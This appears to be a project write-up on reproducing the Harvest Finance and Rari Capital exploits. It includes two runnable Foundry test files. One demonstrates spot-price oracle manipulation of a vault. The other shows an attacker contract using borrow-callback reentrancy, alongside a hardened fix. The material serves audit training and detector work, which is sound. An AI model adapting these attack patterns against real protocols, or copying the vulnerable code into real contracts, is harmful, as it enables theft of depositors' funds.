DeFi Exploit Reproduction & Analysis
Foundry-based PoC reproductions of Harvest Finance (2020) and Rari Capital (2022) exploits with flash loan attack vectors
Problem
Public exploit reports describe attack vectors at a high level but rarely include reproducible test environments. Auditors and researchers must reverse-engineer historical incidents from raw transactions — an expensive prerequisite for building detector heuristics or training new auditors. A library of executable PoCs against mainnet state was missing for two of the most instructive 2020–2022 incidents.
Approach
- Mainnet fork over abstract reproduction: Foundry’s fork-testing replays attacks against real protocol state, preserving oracle prices, liquidity depths, and contract bytecode that abstract reproductions lose.
- Decoded original tx traces to identify the manipulable surface in each incident: Harvest’s dependency on a single Curve Y pool spot price, and Rari’s missing reentrancy guard on the Compound-fork borrow() callback path.
- Real protocol composition: wired Aave V1 flash loans + Uniswap V2 swaps for Harvest’s price manipulation; constructed a cross-protocol callback chain (Aave → Rari Fuse → Uniswap callback) for Rari’s reentrancy.
- Foundry over Hardhat for first-class fork-testing and assertion ergonomics on attack invariants.
Implementation
Harvest Finance (2020) — $34M
Flash-loan USDC/USDT via Aave V1 → manipulate the yCurve stablecoin pool price with large Uniswap V2 swaps → deposit into the Harvest vault while its shares are priced off the depressed spot price → reverse the swap to restore the price → withdraw at the restored price, profiting from the share-price delta. Demonstrates AMM spot-price oracle manipulation and vault share-calculation exploitation in a single atomic transaction.
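The share-price mechanism above, reduced to a self-contained Foundry test. This is an added illustration, not the project's mainnet-fork PoC: every contract here (Token, Pool, Vault, the test) is constructed for the example, the fee-less constant-product Pool stands in for the Curve Y pool, the Vault marks its second-asset holding to that pool's spot price the way Harvest did, and the attacker's flash-loaned capital is simply minted in setUp instead of borrowed from Aave V1. Only forge-std is assumed.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Minimal ERC-20-style token: only what the pool and vault need to move balances.
contract Token {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    function mint(address to, uint256 amt) external { balanceOf[to] += amt; }
    function approve(address spender, uint256 amt) external { allowance[msg.sender][spender] = amt; }
    function transfer(address to, uint256 amt) external { balanceOf[msg.sender] -= amt; balanceOf[to] += amt; }
    function transferFrom(address from, address to, uint256 amt) external {
        allowance[from][msg.sender] -= amt; balanceOf[from] -= amt; balanceOf[to] += amt;
    }
}

// Fee-less constant-product pool standing in for the Curve Y pool. Its spot price is the oracle.
contract Pool {
    Token public immutable a; Token public immutable b;
    constructor(Token _a, Token _b) { a = _a; b = _b; }
    // Price of one B in A, 1e18-scaled. Every swap moves it, so it can be pushed around inside one tx.
    function spotPriceB() public view returns (uint256) {
        return a.balanceOf(address(this)) * 1e18 / b.balanceOf(address(this));
    }
    function swap(Token tokenIn, uint256 amountIn) external returns (uint256 amountOut) {
        Token tokenOut = address(tokenIn) == address(a) ? b : a;
        uint256 rIn = tokenIn.balanceOf(address(this));
        uint256 rOut = tokenOut.balanceOf(address(this));
        amountOut = rOut * amountIn / (rIn + amountIn);   // x*y=k, no fee
        tokenIn.transferFrom(msg.sender, address(this), amountIn);
        tokenOut.transfer(msg.sender, amountOut);
    }
}

// Vault denominated in A that also holds B and values it at the pool's spot price (the Harvest flaw).
contract Vault {
    Token public immutable a; Token public immutable b; Pool public immutable pool;
    mapping(address => uint256) public shares;
    uint256 public totalShares;
    constructor(Token _a, Token _b, Pool _pool) { a = _a; b = _b; pool = _pool; }
    function totalAssets() public view returns (uint256) {
        return a.balanceOf(address(this)) + b.balanceOf(address(this)) * pool.spotPriceB() / 1e18;
    }
    function deposit(uint256 amountA) external {
        uint256 minted = totalShares == 0 ? amountA : amountA * totalShares / totalAssets();
        a.transferFrom(msg.sender, address(this), amountA);
        shares[msg.sender] += minted; totalShares += minted;
    }
    // Pays out a pro-rata slice of both holdings.
    function withdraw(uint256 s) external {
        uint256 outA = a.balanceOf(address(this)) * s / totalShares;
        uint256 outB = b.balanceOf(address(this)) * s / totalShares;
        shares[msg.sender] -= s; totalShares -= s;
        a.transfer(msg.sender, outA); b.transfer(msg.sender, outB);
    }
}

contract SpotPriceVaultTest is Test {
    Token a; Token b; Pool pool; Vault vault;
    address honest = makeAddr("honest");
    address attacker = makeAddr("attacker");

    function setUp() public {
        a = new Token(); b = new Token(); pool = new Pool(a, b); vault = new Vault(a, b, pool);
        a.mint(address(pool), 1_000_000e18); b.mint(address(pool), 1_000_000e18);  // spot: 1 B = 1 A
        b.mint(address(vault), 900_000e18);   // the vault's existing B position (constructed state)
        a.mint(honest, 100_000e18);
        vm.startPrank(honest);
        a.approve(address(vault), type(uint256).max);
        vault.deposit(100_000e18);            // honest NAV: 1,000,000 A
        vm.stopPrank();
        // Attacker's working capital, minted here in place of the Aave V1 flash loan.
        a.mint(attacker, 500_000e18); b.mint(attacker, 1_000_000e18);
    }

    function valueOf(address who) internal view returns (uint256) {
        return a.balanceOf(who) + b.balanceOf(who) * pool.spotPriceB() / 1e18;
    }

    function test_spotPriceManipulationInflatesShares() public {
        uint256 before = valueOf(attacker);
        vm.startPrank(attacker);
        a.approve(address(pool), type(uint256).max);
        b.approve(address(pool), type(uint256).max);
        a.approve(address(vault), type(uint256).max);
        pool.swap(b, 1_000_000e18);           // 1. dump B: spot falls to 0.25 A, vault NAV is marked down
        assertEq(vault.totalAssets(), 325_000e18);
        vault.deposit(500_000e18);            // 2. buy shares against the depressed NAV
        pool.swap(a, 500_000e18);             // 3. reverse the swap; price returns to 1:1
        assertEq(pool.spotPriceB(), 1e18);
        vault.withdraw(vault.shares(attacker)); // 4. redeem at the honest NAV
        vm.stopPrank();
        assertGt(valueOf(attacker), before);
        assertLt(vault.totalAssets(), 1_000_000e18); // the loss is borne by the remaining depositor
    }
}
```

Run with `forge test --match-contract SpotPriceVaultTest -vv`. The invariant worth asserting in a real fork test is the same one the last two lines check: attacker value strictly up, vault NAV strictly down, with the pool price unchanged at the end, which is exactly what a spot-price-based valuation cannot defend against inside a single transaction.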
Rari Capital / Fei Protocol (2022) — $80M
Flash-loan DAI via Aave V1 → supply collateral to a Rari Fuse pool (Compound fork) → borrow, and re-enter from the transfer callback fired while borrow() is still paying out, before the position is finalized → chain the re-entry through a Uniswap V2 swap callback to drain additional collateral. Demonstrates callback-based (ERC-777-style) reentrancy on Compound-style lending markets and cross-protocol composability risk.
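The borrow-callback reentrancy, as a self-contained Foundry test rather than the project's fork reproduction. All contracts (Comptroller, Market, Attacker, the test) are constructed for this example and simplified to ETH-only markets; the flash loan is replaced by ETH the test sends to the attacker, and the Uniswap leg is omitted. The vulnerable `borrow()` keeps Compound's original pay-out-then-record ordering but sends ETH with `call` (full gas) instead of `transfer()` (2300 gas), which is the change that made the Fuse markets re-enterable; the hardened variant records the debt before paying out. Only forge-std is assumed.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Comptroller: decides which markets count as collateral, as in Compound. No reentrancy lock here.
contract Comptroller {
    Market public market;
    mapping(address => bool) public inMarket;
    function setMarket(Market m) external { market = m; }
    function enterMarket() external { inMarket[msg.sender] = true; }
    // Leaving is allowed only with no outstanding debt; reads the *stored* borrow balance.
    function exitMarket() external {
        require(market.borrows(msg.sender) == 0, "has debt");
        inMarket[msg.sender] = false;
    }
    function borrowAllowed(address u, uint256 amt) external view returns (bool) {
        return inMarket[u] && market.borrows(u) + amt <= market.collateral(u) * 75 / 100;
    }
    // Once a user has exited the market, its collateral is not counted, so no shortfall check runs.
    function redeemAllowed(address u, uint256 amt) external view returns (bool) {
        if (!inMarket[u]) return true;
        return market.borrows(u) <= (market.collateral(u) - amt) * 75 / 100;
    }
}

// CEther-style market: ETH collateral, ETH borrows. Same-contract reentrancy is blocked by the lock,
// but the lock cannot protect the Comptroller's entry points.
contract Market {
    Comptroller public immutable comptroller;
    bool public immutable effectsFirst;
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public borrows;
    bool private locked;
    modifier nonReentrant() { require(!locked, "re-entered"); locked = true; _; locked = false; }
    constructor(Comptroller c, bool _effectsFirst) { comptroller = c; effectsFirst = _effectsFirst; }
    receive() external payable {}   // lender liquidity
    function supply() external payable nonReentrant { collateral[msg.sender] += msg.value; }
    function redeem(uint256 amt) external nonReentrant {
        require(comptroller.redeemAllowed(msg.sender, amt), "shortfall");
        collateral[msg.sender] -= amt;
        (bool ok,) = msg.sender.call{value: amt}("");
        require(ok, "send");
    }
    function borrow(uint256 amt) external nonReentrant {
        require(comptroller.borrowAllowed(msg.sender, amt), "shortfall");
        if (effectsFirst) borrows[msg.sender] += amt;      // hardened: record the debt first
        // Fuse paid out with call() instead of Compound's transfer(): the borrower now has enough gas
        // to re-enter other contracts while, in the vulnerable ordering, the debt is still unrecorded.
        (bool ok,) = msg.sender.call{value: amt}("");
        require(ok, "send");
        if (!effectsFirst) borrows[msg.sender] += amt;     // vulnerable: Compound's original ordering
    }
}

contract Attacker {
    Market immutable market; Comptroller immutable comptroller;
    constructor(Market m, Comptroller c) { market = m; comptroller = c; }
    function attack() external payable {
        market.supply{value: msg.value}();
        comptroller.enterMarket();
        market.borrow(msg.value * 75 / 100);   // receive() below fires inside this call
        market.redeem(msg.value);              // collateral leaves; the debt stays behind
    }
    // Re-entry point: the borrow's ETH payout lands here before borrows[] is written.
    receive() external payable {
        if (msg.sender == address(market) && comptroller.inMarket(address(this))) {
            comptroller.exitMarket();          // passes: stored debt is still zero
        }
    }
}

contract BorrowReentrancyTest is Test {
    function deploy(bool effectsFirst) internal returns (Market m, Attacker at) {
        Comptroller c = new Comptroller();
        m = new Market(c, effectsFirst);
        c.setMarket(m);
        vm.deal(address(m), 100 ether);        // lenders' liquidity (constructed)
        vm.deal(address(this), 10 ether);
        at = new Attacker(m, c);
    }
    function test_callReentrancyDrainsCollateral() public {
        (Market m, Attacker at) = deploy(false);
        at.attack{value: 10 ether}();
        assertEq(address(at).balance, 17.5 ether);          // 7.5 borrowed + 10 collateral back
        assertEq(m.borrows(address(at)), 7.5 ether);         // unbacked debt left in the pool
        assertEq(m.collateral(address(at)), 0);
    }
    function test_effectsBeforeInteractionsBlocksIt() public {
        (, Attacker at) = deploy(true);
        vm.expectRevert(bytes("send"));                      // exitMarket now sees the debt and reverts
        at.attack{value: 10 ether}();
    }
}
```

Run with `forge test --match-contract BorrowReentrancyTest -vv`. The point a detector heuristic should key on is the cross-contract shape: `borrow()` is itself `nonReentrant`, yet the re-entry lands in `exitMarket` on the Comptroller, which shares no lock with the market, so the only robust fix is the state-write-before-external-call ordering shown in the `effectsFirst` branch.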
Outcome
- Two production-grade PoCs reproducing $114M of combined historical exploit value.
- Suitable as audit training material, detector validation cases, and reference implementations for security researchers.
- Concrete demonstrations of two of the most common DeFi attack patterns of the era: AMM spot-price manipulation and Compound-fork reentrancy.
Technologies
- Framework: Foundry (mainnet-fork testing)
- Protocols Analyzed: Aave V1, Uniswap V2, Harvest Finance, Rari Fuse (Compound fork)
- Language: Solidity